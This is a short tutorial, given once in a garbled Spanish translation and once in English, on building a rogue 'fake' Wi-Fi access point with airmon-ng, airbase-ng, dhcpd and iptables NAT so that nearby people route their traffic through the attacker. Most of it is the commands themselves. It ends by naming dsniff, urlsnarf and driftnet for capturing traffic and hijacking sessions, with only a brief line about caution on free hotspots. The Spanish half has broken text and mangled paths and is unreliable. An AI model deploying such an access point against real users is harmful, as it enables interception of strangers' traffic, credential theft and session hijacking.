Professional Documents
Culture Documents
Configurar dhcpd.conf
En este caso, mi sistema de prueba es el siguiente: > Uso de back | track4 pre ltima > Uso
dongle WiFi para crear una conexin a Internet en wlan1 (a travs de puerta de enlace
192.168.1.1) > Uso de mi tarjeta de netbook inalmbrica (Atheros) para crear el falso AP En
primer lugar crear / configurar el archivo dhcpd.conf para su uso posterior; nano /
etc/dhcpd3/dhcpd.conf ddns-update-style ad-hoc; default-lease-time 600; max-lease-time
7200;subred 192.168.2.128 mscara de red 255.255.255.128 { option subnet-mask
255.255.255.128; opcin broadcast-address 192.168.2.255; option routers
192.168.2.129; option domain-name-servers 4.2.2.2; rango 192.168.2.130
192.168.2.140; } Ctrl X - > y -> Enter para guardar el archivo.
A continuacin, para iniciar el ap falso con base area, la interfaz tiene que estar en modo
monitor;
airmon-ng
airmon-ng start wlan0
En este caso, yo ya tena una conexin a Internet en funcionamiento en wlan1, por lo tanto,
los mensajes de advertencia, sin embargo esto no tuvo consecuencias an ms. Luego, lleve
ifconfig at0
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add-net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
mkdir-p / var / run / dhcpd && chown dhcpd: dhcpd / var / run / dhcpd
Luego de configurar el iptables para enrutar el trfico a travs de la interfaz del grifo a la
Ahora, bsicamente, tiene un punto de acceso falso que la gente puede conectarse y navegar
por internet .. todo a travs de su conexin.
Obviamente, esto puede ser abusado en cualquier nmero de formas, todo el trfico se
pueden capturar y analizar;
dsniff se puede ejecutar en l junto con urlsnarf, etc con redes de deriva, las sesiones
pueden ser secuestrados en tiempo real .. As que viene a demostrar que debe ser cuidado
con los puntos de acceso libre ..
P U B L I C A D O P O R C I N TA E N 1 4 : 5 9
Versin original
I had a lot of trouble with this and only really was able to complete it with the help of Gitsnik
& Nick The Greek on the Remote Exploit forums.. awesome help there guys ;)
Configure dhcpd.conf
nano /etc/dhcp3/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
Then to start the fake ap with airbase, the interface needs to be in monitor mode ;
airmon-ng
airmon-ng start wlan0
airbase-ng -e "TEST_AP" -c 9 mon0
This will create a simple tap interface, on at0, with no encryption, on channel 9 and with the
essid TEST_AP.
In this case I already had an internet connection up and running on wlan1, hence the warning
messages, however this was of no further consequence.
Then start DHCP, I was getting errors on the dhcpd settings, this is where the help came in :)
Then to point the command to the alternative dhcpd.conf file and the alternative .pid file
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
Then to setup the iptables to route the traffic through the tap interface to the internet
connection (internet connection being the one wlan1 is connected to over my 192.168.1.1
gateway).
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1
Now basically you have a fake ap which people can connect to and browse the internet.. all
through your connection.
Obviously this can be abused in any number of ways, all traffic can be captured and analyzed;
dsniff could be run on it together with urlsnarf, driftnet etc., sessions could be hijacked in
real time..